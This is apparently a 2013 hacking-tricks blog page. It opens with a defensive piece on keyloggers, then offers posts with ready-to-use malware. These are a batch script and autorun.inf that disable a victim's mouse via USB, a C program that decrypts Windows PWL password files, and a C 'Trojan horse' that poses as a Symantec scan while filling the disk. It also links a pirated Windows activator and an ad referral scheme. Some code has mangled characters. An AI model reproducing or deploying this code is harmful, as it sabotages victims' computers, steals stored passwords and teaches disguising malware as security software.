Since the Internet has become a part of daily life and business, rapid growth of cybercrime endangers the whole society. Information-stealing software certainly facilitate these crimes, sometimes being the only instrument a thief needs to commit them. 


Real protection starts with identifying the threat. 

One of the most effective ways of stealing information is capturing keystrokes. A small, fairly simple program (a programmer can write a plain one in a couple of days) captures everything the user is doing - keystrokes, mouse clicks, files opened and closed, sites visited. A little more sophisticated programs of this kind also capture text from windows and make screenshots (record everything displayed on the screen) - so the information is captured even if the user doesn't type anything, just opens the views the file. These programs are called Keylogging Programs (keyloggers, key loggers, keystroke loggers, key recorders, key trappers, key capture programs, etc.) They form the most dangerous core of so-called spyware. 

Old keyloggers become obsolete. New keyloggers appear all the time. Existing keylogging programs are constantly modernized. It is extremely likely that several keyloggers are being written at this very moment. 

Means of defense: Anti-spyware, anti-viruses and personal firewalls 

Experts recommend to use a combination of three products: a personal firewall, an anti-virus and an anti-spyware - and regularly update the latter two. However, even in this case a computer won't be 100% secure against keyloggers. Why? 

Most anti-spy and anti-virus products, whatever their names are and whatever their advertising says, apply the same scheme - pattern matching. These programs scan the system, looking for code that matches signatures - pieces of spyware code, which are kept in so-called signature bases. These products can protect from spyware which has already been detected and studied before. This approach makes anti-spyware developers inevitably lag behind spyware writers. Without frequent updating anti-spy products lose their efficiency very quickly. It can become very risky because the PC owner still relies on his anti-spy or anti-virus. 

Unfortunately, no signature base is complete enough to guarantee total protection. Even if the base is updated regularly, if this spyware signature is not included there - the anti-spy software is helpless against it. Anti-spies do not recognize every spyware product, when it is brand-new, for some time - until its signature is included into the bases and users update their anti-spies. There also are kinds of spy software which signatures are unlikely to be included into any signature base. For example, spy software can be developed by government organizations for their own purposes. Some commercial, especially corporate, monitoring products are very rarely included into signature bases, though many of them can well be used for spying as well. 

Another case - when there is only one copy of spy program. It doesn't take too long for a good programmer to write one. Spyware, just like clothes, can be "tailor-made". Hackers often take source codes of spy software from the Internet change them a bit and then compile something new, which no signature base will recognize. 

When a keylogging module is the part of a virus, it can cause lots of trouble, because several hours or even days will pass until it is included into signature bases. 

A problem with a personal firewall is that it asks too many questions. Even an experienced user can answer them incorrectly and allow some information-stealing program or module do its job. For example, some commercial monitoring programs use processes of programs with access to the Internet (browsers, mail clients, etc.) As a result, if the anti-virus overlooks a keylogger, valuable information can be stolen and sent via the Internet to the address specified by the hacker (or some other person).


Download
click to begin
4.86MB .zip

Password Protect Your Games And Softwares

Sunday 13 October 2013

Protect Your Games And Softwares With Passsword

Today I am going to provide you the best way to protect your games and softwares with password.


How To Use-



  • Download
  • Install
  • Run
Download
click to begin
844KB .exe

Windows 8 Pro Best Activator

Friday 11 October 2013

Windows 8 Pro Activator

Today I am providing an easy way to activate your Windows 8 Pro.
It will install a product key in Windows 8 Pro. I created and used it, it just worked fine for me.

How To Install-



  • Download The Activator
  • Terminate Your Internet Connection
  • Run As Administrator
  • It Will Ask For Password
  • Enter The Password
  • Let It Do Its Work
  • Reboot
  • Your Windows 8 Pro is Now Activated.
  • Enjoy
Download
click to begin
37KB .exe

Password-bmtricks

If you get any problem. Please comment and let me know.

Get Free Recharge On Any Operator All Over The World

Thursday 10 October 2013

Get Free Recharge On Any Operator

Hello Friends,
Today I am going to tell you the best way to get free recharge on any network.
Its very easy. You just have to register and get the recharge.


Follow The Following Steps-
1. Visit here.
2. Fill the Form with-
  • Your Email
  • Password You Want (New Password)
  • Your Mobile Number
  • Gender
  • Your Name
  • Date Of Birth (Day, Month, Year)
  • City Where You Live
  • Captcha (You Will Get)
3. Click on CREATE ACCOUNT


You will get some recharge instantly.
You can play quizzes to get more recharge.
Login daily to get more money.
*You Can Also Register With This Link http://adfoc.us/16563834451861

Disable Victim's Mouse

Monday 30 September 2013

Disabling Your Victim's Computer Mouse

Here's the Method-

We are going to create this virus using our usual Batch programming. In this post i am not only giving you simply the code but also explanation for the Batch program. So I hope that this post will make you happy.

Batch Programming Code:

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Explanation about this code-

"@echo off" This command will either turn ON, or OFF the command you put in a batch file from showing itself. (Don't confuse now, batch programming intro will make you clear).

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" will access the registry stored in  this location "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

The  Procedure to create this virus-

Okay now we will see the what are the procedure to follow in order to make this virus perfectly work in victim pc. 

Step 1:
  1. Copy the Batch code into notepad. 
  2. Save it as .bat extension (for eg: clickme.bat)

Step 2: 

     Now open the notepad and copy this code-


[autorun]
Open=filename.bat
Action=Mouse Disable

   Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.

Step 3:
      
     Then copy the two files in your pen drive or victim's pen drive.

That's all we have finished.  Now bring your pen drive to your friend or victim home.  Now whenever the mouse is inserted ,the mouse will be disabled.

How to recover from this attack?

To recover from this attack ,you can follow these steps:-
Copy this code into the notepad:-

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

Save it with .bat extension(for eg: release.bat).
Now open this batch will re-enable the mouse actions.

Have Fun With Google

Fun With Google by Using I'm Feeling Lucky




Copy each of code and click I'm Feeling Lucky

google gravity
google sphere
google loco
epic google
find chuck norris
google flight simulator
let me google that for you
google gothic
google pacman
google guitar
google pirate
google rainbow
google reverse
elgoog
who is the cutest person in the world
Who is the cutest?
google pig latin
google blue
google pond
goglogo
google is gold
google 133t
ewmew fudd
google gangster
google bork
funny google
xx-klingon
xx-piglatin
xx-hacker
googles by kids
psychic google
2204355
Annoying Google
LOL Limewire
google gulp
Blackle
Google Mentalplex
Google Chart
Google Pigeonrank
Google Fool Animation
Googlunaplex
Google Virgle
Google gDay
Google Chrome 3D
Google Moon
Google Tisp

    C Program To Get All Passwords

    Saturday 28 September 2013

    Get All The Passwords Accessed From Your Computer Using C Program


    Get all the passwords accessed from your computer.......
    After you run the code, all passwords will be displayed..
     

    # include<stdio.h>
    # include<stdio.h>
    # include<process.h>
    # include<stdlib.h>
    # include<ctype.h>
    # include<conio.h>
    # include<mem.h>
    unsigned char huge Data[100001];
    unsigned char keystream[1001];
    int Rpoint[300];
    void main(int argc,char *argv[]){
    FILE *fd;
    int i,j;
    int size;
    char ch;
    char *name;
    int cracked;
    int sizemask;
    int maxr;
    int rsz;
    int pos;
    int Rall[300]; /* Resourse allocation table */
    if(argc<2){
    printf("usage: glide filename (username)");
    exit(1);
    }
    /* Read PWL file */
    fd=fopen(argv[1],"rb");
    if(fd==NULL){
    printf("can't open file %s",argv[1]);
    exit(1);
    }
    size=0;
    while(!feof(fd)){
    Data[size++]=fgetc(fd);
    }
    size--;
    fclose(fd);
    /* Find Username */
    name=argv[1];
    if(argc>2)name=argv[2];
    printf("Username:%s
    ",name);
    /* Copy encrypted text into keystream */
    cracked=size-0x0208;
    if(cracked<0)cracked=0;
    if(cracked>1000)cracked=1000;
    memcpy(keystream,Data+0x208,cracked);
    /* Generate 20 bytes of keystream */
    for(i=0;i<20;i++){
    ch=toupper(name[i]);
    if(ch==0)break;
    if(ch=='.')break;
    keystream[i]^=ch;
    };
    cracked=20;
    /* Find allocated resources */
    sizemask=keystream[0]+(keystream[1]<<8);
    printf("Sizemask:%04X
    ",sizemask);
    for(i=0;i<256;i++){
    if(Data[i]!=0xff){
    Rall[Data[i]]++;
    if(Data[i]>maxr)maxr=Data[i];
    }
    }
    maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
    divisible by 16 */
    /*Search after resources */
    Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
    for(i=0;i<maxr;i++){
    /* Find the size of current resourse */
    pos=Rpoint[i];
    rsz=Data[pos]+(Data[pos+1]<<8);
    rsz^=sizemask;
    printf("Analysing block with size:%04x (%d:%d)
    ",rsz,i,Rall[i]);
    if((Rall[i]==0)&&(rsz!=0)){
    printf("Unused resourse has nonzero size!!!
    ");
    printf("If last line produed any:You may try to recover
    ");
    printf("Press y to attempt the recovery
    ");
    ch=getch();
    if(ch!='y')exit(0);
    rsz=2;
    i=i-1;
    }
    pos=pos+rsz;
    /* Resourse have a tedency to have the wrong size for some reason*/
    /* Chech for correct size*/
    if(i<maxr-1){
    while(Data[pos+3]!=keystream[1]){
    printf(":",Data[pos+3]);
    pos=pos+2; /* Very rude may fail */
    }
    }
    pos+=2; /* Include pointer in size */
    Rpoint[i+1]=pos;
    }
    Rpoint[maxr]=size;
    /* Insert Table data into keystream*/
    for(i=0;i<=maxr;i++){
    keystream[20+2*i]^=Rpoint[i] & 0x00ff;
    keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff;
    }
    cracked+=maxr*2+2;
    printf("%d Bytes of ketstream recoverd
    ",cracked);
    /* Decrypt resources */
    for(i=0;i<maxr;i++){
    rsz=Rpoint[i+1]-Rpoint[i];
    if(rsz>cracked)rsz=cracked;
    printf("Resource[%d](%d)
    ",i,rsz);
    for(j=0;j<rsz;j++)
    printf("%c",Data[Rpoint[i]+j]^keystream[j]);
    printf("
    ");
    }
    exit(0);
    }

    C Programming Code That Accepts Password

    C Programming Code That Accepts Password

    The following is a simple code that accept the given password, and masks each entered character as "*" and even accept backspace. This is not for practical usage but for the beginners.



    #include<stdio.h>
    #include<conio.h>
    char pw[25],ch;
    int i;
    void main()
    {
    clrscr();
    puts(“Enter password”);
    while(1)
    {
    if(i<0)
    i=0;
    ch=getch();
    if(ch==13)
    break; /*13 is ASCII value of ENTER*/
    if(ch==8) /*ASCII value of BACKSPACE*/
    {
    putch(‘b’);
    putch(NULL);
    putch(‘b’);
    –i;
    continue;
    }
    pw[i++]=ch;
    ch=’*’;
    putch(ch);
    }
    pw[i]=’?;
    printf(“nn%s”,pw);
    getch();
    }

    Create A Trojan Horse In C Language

    Harmful Trojan Horse  in C Language


    Just copy this code in your notepad file and then save it as  any file name u want with extension .c
    For example, ( 123.c )

    #include<stdio.h>
    #include<conio.h>
    #include<dos.h>
    #include<stdlib.h>
    FILE *a,*t,*b;
    int r,status,vir_count;
    double i;
    char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

    void eatspace(void);
    void findroot(void);
    void showstatus(void);
    void draw(void);
    void accept(void);

    void main()
    {
    draw();
    accept();
    textcolor(WHITE);
    draw();
    gotoxy(12,8);
    cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
    sleep(3);
    gotoxy(12,8);
    delline();
    cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
    getch();
    gotoxy(12,8);
    delline();
    findroot();
    }

    void accept()
    {
    textcolor(LIGHTRED);
    gotoxy(1,8);
    cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

    if((choice=getch())!=13)
    exit(0);
    }

    void draw()
    {
    clrscr();
    textcolor(WHITE);
    gotoxy(12,2);
    cputs("********************************************************");
    gotoxy(12,6);
    cputs("********************************************************");
    gotoxy(12,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(67,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(14,4);
    cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
    }

    void findroot()
    {
    t=fopen("C:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    textcolor(WHITE);
    a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("D:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("E:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("F:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    if(t==NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
    getch();
    exit(1);
    }
    exit(1);
    }

    void eatspace()
    {
    textcolor(LIGHTRED);
    gotoxy(12,16);
    cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
    textcolor(WHITE);
    gotoxy(12,18);
    while(1)
    {
    for(r=1;r<4;r++)
    {
    for(i=1;i<900000;i++)
    {
    status=fputs(ch,b);
    if(status==EOF)
    {
    textcolor(WHITE);
    vir_count=random(120);
    draw();
    gotoxy(12,8);
    cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
    gotoxy(12,10);
    cprintf("PRESS ANY KEY TO CLOSE...");
    getch();
    break;
    }
    }
    cputs(".");
    if(status==EOF) break;
    }
    if(status==EOF) break;
    }
    exit(0);
    }

    void showstatus()
    {
    gotoxy(12,8);
    cputs("SCANNING THE SYSTEM FOR THREATS");
    gotoxy(12,10);
    cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
    gotoxy(12,13);
    cputs("SCAN IN PROGRESS. PLEASE WAIT...");
    }


    This is a program to eat up all your disk spaces. And this MAY harm your computer, so please try this at your own risk. We will not be responsible for any damage.

    If u want to stop this, just press CTRL+SHIFT+ESC to go to task manager and under process tab, look for space eater.c and end the process.

    You can download the file-

    Download
    click to begin
    3.79KB .c

    Facebook Picture Comments

    Thursday 26 September 2013

    Facebook Picture Comments

    Now-a-days, picture comments are widely used. So Here I am providing you 63 Facebook picture comments.
    If you like, please comment.

    Some of the picture comments-

    Give that man 10 Kg Pyaaj

    Aap mar jao na please

    Bakwaas Post

    Where is Admin Home

    Download
    click to begin
    754KB .zip

    I will be providing more pictures. Keep Visiting....

    Make Your Website User's Homepage

    Monday 23 September 2013

    Make Your Website User's Homepage





    How to make menus in Java

    Saturday 21 September 2013

    How to make menus in Java




    Download: Java App

    Copyright @ 2014 BM TRICKS 1. Designed by Surjit Singh